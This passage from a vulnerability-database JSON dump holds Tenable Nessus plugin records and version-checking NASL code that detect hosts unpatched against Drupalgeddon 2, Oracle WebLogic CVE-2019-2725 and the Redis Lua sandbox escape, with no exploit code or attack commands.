Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/29\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"drupal7\", reference:\"7.32-1+deb8u11\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"drupal7\", reference:\"7.52-2+deb9u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, 
{"lastseen": "2022-06-16T16:19:50", "description": "Drupal Security Team reports :\n\nCVE-2018-7600: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-04-16T00:00:00", "type": "nessus", "title": "FreeBSD : drupal -- Drupal Core - Multiple Vulnerabilities (a9e466e8-4144-11e8-a292-00e04c1ea73d) (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2021-11-30T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:drupal7", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_A9E466E8414411E8A29200E04C1EA73D.NASL", "href": "https://www.tenable.com/plugins/nessus/109055", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109055);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\"CVE-2018-7600\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"FreeBSD : drupal -- Drupal Core - Multiple Vulnerabilities (a9e466e8-4144-11e8-a292-00e04c1ea73d) (Drupalgeddon 2)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Drupal Security Team reports :\n\nCVE-2018-7600: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before\n8.4.6, and 8.5.x before 8.5.1 allows remote attackers to 
execute\narbitrary code because of an issue affecting multiple subsystems with\ndefault or common module configurations.\"\n );\n # https://vuxml.freebsd.org/freebsd/a9e466e8-4144-11e8-a292-00e04c1ea73d.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8ffa708c\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:drupal7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/16\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", 
value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"drupal7<7.57\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T17:51:42", "description": "The Drupal CMS installed on the remote host is affected by a remote command execution vulnerability. 
A remote, unauthenticated attacker can leverage this issue to execute arbitrary commands on the remote host.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-04-13T00:00:00", "type": "nessus", "title": "Drupal Remote Code Execution Vulnerability (SA-CORE-2018-002) (exploit)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2022-08-15T00:00:00", "cpe": ["cpe:/a:drupal:drupal"], "id": "DRUPAL_CVE-2018-7600_RCE.NBIN", "href": "https://www.tenable.com/plugins/nessus/109041", "sourceData": "Binary data drupal_CVE-2018-7600_rce.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-14T14:24:59", "description": "A vulnerability in Oracle WebLogic Server 10.3.6.0.0 & 12.1.3.0.0 allows an unauthenticated attacker with HTTP access to the service to obtain arbitrary code execution due to an insecure deserialization.\n\nOracle proposes the associated patches on its site to fix the vulnerability.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-02-19T00:00:00", "type": "nessus", "title": "Oracle WebLogic 10.3.6.0.0 / 12.1.3.0.0 Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-2725"], "modified": "2021-09-07T00:00:00", "cpe": [], "id": "WEB_APPLICATION_SCANNING_112704", "href": "https://www.tenable.com/plugins/was/112704", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-08T15:10:05", "description": "The version of Oracle WebLogic Server installed on the remote host is affected by a remote code execution vulnerability in the WLS9-async component due to unsafe deserialization of XML encoded Java objects. 
An unauthenticated, remote attacker can exploit this, via a crafted Java object, to execute arbitrary Java code in the context of the WebLogic server.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-26T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server wls9_async_response / wls-wsat Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-2725"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:weblogic_server"], "id": "ORACLE_WEBLOGIC_CVE-2019-2725.NASL", "href": "https://www.tenable.com/plugins/nessus/124337", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124337);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2019-2725\");\n script_bugtraq_id(108074);\n script_xref(name:\"IAVA\", value:\"2019-A-0128\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n\n script_name(english:\"Oracle WebLogic Server wls9_async_response / wls-wsat Remote Code Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application server installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle WebLogic Server installed on the remote host\nis affected by a remote code execution vulnerability in the WLS9-async component\ndue to unsafe deserialization of XML encoded Java objects. 
An unauthenticated, \nremote attacker can exploit this, via a crafted Java object, to execute \narbitrary Java code in the context of the WebLogic server.\");\n # https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?95b9a80b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the Oracle Security Alert\nAdvisory.\n\nRefer to Oracle for any additional patch instructions or\nmitigation options.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\nwindows\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-2725\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle Weblogic Server Deserialization RCE - AsyncResponseService');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_weblogic_server_installed.nbin\", \"os_fingerprint.nasl\");\n script_require_keys(\"installed_sw/Oracle WebLogic Server\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\ninclude(\"obj.inc\");\ninclude(\"spad_log_func.inc\");\n\napp_name = \"Oracle WebLogic Server\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nohome = install[\"Oracle Home\"];\nsubdir = install[\"path\"];\nversion = install[\"version\"];\n\nfix_sets = [];\nextra = NULL;\n\nspad_log(message:\"checking version [\" + version + \"]\");\n\nif (version =~ \"^12\\.1\\.3\\.\" && ver_compare(ver:version, fix:\"12.1.3.0.190716\", strict:FALSE) < 0)\n{\n fix_sets = [\n { 'fix_cpu' : '28710923', 'fix_adv' : '29694149'},\n { 'fix_cpu' : '29204657', 'fix_adv' : '29694149'},\n { 'fix_cpu' : '28710923', 'fix_adv' : '29792735'},\n { 'fix_cpu' : '29204657', 'fix_adv' : '29792736'},\n { 'fix_cpu' : '29633448', 'fix_adv' : '29633448'} # this little check-the-same-thing-2x code-hack allows us check for a supersede patch, thanks oracle!\n ];\n extra = '28710923 and 29694149 or 29204657 and 29694149 or 29633448\\n';\n}\nelse if (version =~ \"^10\\.3\\.6\\.\" && ver_compare(ver:version, fix:\"10.3.6.0.190716\", strict:FALSE) < 0)\n{\n fix_sets = [\n { 'fix_cpu' : '7HKN', 'fix_adv' : 'ICDZ'},\n { 'fix_cpu' : 'U5I2', 'fix_adv' : 'IL49'},\n { 'fix_cpu' : '7HKN', 'fix_adv' : 
'5H68'},\n { 'fix_cpu' : 'U5I2', 'fix_adv' : '6JJ4'},\n { 'fix_cpu' : 'MXLE', 'fix_adv' : 'MXLE'} # this little check-the-same-thing-2x code-hack allows us check for a supersede patch, thanks oracle!\n ];\n extra = '7HKN and ICDZ or U5I2 and IL49 or MXLE\\n';\n}\nelse\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n\nforeach fix (fix_sets)\n{\n if( !isnull(install[fix['fix_cpu']]) && !isnull(install[fix['fix_adv']]) )\n audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n}\n\nos = get_kb_item_or_exit('Host/OS');\nif ('windows' >< tolower(os))\n{\n port = get_kb_item('SMB/transport');\n if (!port) port = 445;\n}\nelse port = 0;\n\nreport =\n '\\n Oracle Home : ' + ohome +\n '\\n Install path : ' + subdir +\n '\\n Version : ' + version + \n '\\n Fix : ' + extra;\n\nsecurity_report_v4(extra:report, severity:SECURITY_HOLE, port:port);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T15:10:25", "description": "The remote Oracle WebLogic server is affected by a remote code execution vulnerability in the WLS9-async component due to unsafe deserialization of XML encoded Java objects. 
An unauthenticated, remote attacker can exploit this, via a crafted Java object, to execute arbitrary Java code in the context of the WebLogic server.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-26T00:00:00", "type": "nessus", "title": "Oracle WebLogic WLS9-async Remote Code Execution (remote check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-2725"], "modified": "2022-08-15T00:00:00", "cpe": ["cpe:/a:oracle:weblogic_server"], "id": "WEBLOGIC_ASYNC_RESPONSE_RCE.NBIN", "href": "https://www.tenable.com/plugins/nessus/124338", "sourceData": "Binary data weblogic_async_response_rce.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-15T20:33:16", "description": "The remote Debian 10 / 11 host has packages installed that are affected by a vulnerability as referenced in the dsa-5081 advisory.\n\n - It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution. 
(CVE-2022-0543)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2022-02-21T00:00:00", "type": "nessus", "title": "Debian DSA-5081-1 : redis - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-0543"], "modified": "2022-04-28T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:redis", "p-cpe:/a:debian:debian_linux:redis-sentinel", "p-cpe:/a:debian:debian_linux:redis-server", "p-cpe:/a:debian:debian_linux:redis-tools", "cpe:/o:debian:debian_linux:10.0", "cpe:/o:debian:debian_linux:11.0"], "id": "DEBIAN_DSA-5081.NASL", "href": "https://www.tenable.com/plugins/nessus/158200", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory dsa-5081. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158200);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/28\");\n\n script_cve_id(\"CVE-2022-0543\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"Debian DSA-5081-1 : redis - security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Debian 10 / 11 host has packages installed that are affected by a vulnerability as referenced in the dsa-5081\nadvisory.\n\n - It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a\n (Debian-specific) Lua sandbox escape, which could result in remote code execution. 
(CVE-2022-0543)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1005787\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/source-package/redis\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/security/2022/dsa-5081\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2022-0543\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/buster/redis\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/bullseye/redis\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the redis packages.\n\nFor the stable distribution (bullseye), this problem has been fixed in version 5\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-0543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Redis Lua Sandbox Escape');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/02/21\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:redis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:redis-sentinel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:redis-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:redis-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:11.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('debian_package.inc');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar release = get_kb_item('Host/Debian/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Debian');\nvar release = chomp(release);\nif (! 
preg(pattern:\"^(10)\\.[0-9]+|^(11)\\.[0-9]+\", string:release)) audit(AUDIT_OS_NOT, 'Debian 10.0 / 11.0', 'Debian ' + release);\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Debian', cpu);\n\nvar pkgs = [\n {'release': '10.0', 'prefix': 'redis', 'reference': '5:5.0.14-1+deb10u2'},\n {'release': '10.0', 'prefix': 'redis-sentinel', 'reference': '5:5.0.14-1+deb10u2'},\n {'release': '10.0', 'prefix': 'redis-server', 'reference': '5:5.0.14-1+deb10u2'},\n {'release': '10.0', 'prefix': 'redis-tools', 'reference': '5:5.0.14-1+deb10u2'},\n {'release': '11.0', 'prefix': 'redis', 'reference': '5:6.0.16-1+deb11u2'},\n {'release': '11.0', 'prefix': 'redis-sentinel', 'reference': '5:6.0.16-1+deb11u2'},\n {'release': '11.0', 'prefix': 'redis-server', 'reference': '5:6.0.16-1+deb11u2'},\n {'release': '11.0', 'prefix': 'redis-tools', 'reference': '5:6.0.16-1+deb11u2'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var release = NULL;\n var prefix = NULL;\n var reference = NULL;\n if (!empty_or_null(package_array['release'])) release = package_array['release'];\n if (!empty_or_null(package_array['prefix'])) prefix = package_array['prefix'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (release && prefix && reference) {\n if (deb_check(release:release, prefix:prefix, reference:reference)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : deb_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = deb_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'redis / redis-sentinel / redis-server / redis-tools');\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-15T18:18:19", "description": "The remote Ubuntu 20.04 LTS / 21.10 
host has packages installed that are affected by a vulnerability as referenced in the USN-5316-1 advisory.\n\n - It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution. (CVE-2022-0543)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 10, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2022-03-08T00:00:00", "type": "nessus", "title": "Ubuntu 20.04 LTS / 21.10 : Redis vulnerability (USN-5316-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-0543"], "modified": "2022-04-28T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:20.04:-:lts", "cpe:/o:canonical:ubuntu_linux:21.10", "p-cpe:/a:canonical:ubuntu_linux:redis", "p-cpe:/a:canonical:ubuntu_linux:redis-sentinel", "p-cpe:/a:canonical:ubuntu_linux:redis-server", "p-cpe:/a:canonical:ubuntu_linux:redis-tools"], "id": "UBUNTU_USN-5316-1.NASL", "href": "https://www.tenable.com/plugins/nessus/158688", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-5316-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <https://ubuntu.com/security/notices>. 
Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(158688);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/28\");\n\n script_cve_id(\"CVE-2022-0543\");\n script_xref(name:\"USN\", value:\"5316-1\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"Ubuntu 20.04 LTS / 21.10 : Redis vulnerability (USN-5316-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 20.04 LTS / 21.10 host has packages installed that are affected by a vulnerability as referenced in\nthe USN-5316-1 advisory.\n\n - It was discovered, that redis, a persistent key-value database, due to a packaging issue, is prone to a\n (Debian-specific) Lua sandbox escape, which could result in remote code execution. 
(CVE-2022-0543)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-5316-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-0543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Redis Lua Sandbox Escape');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", 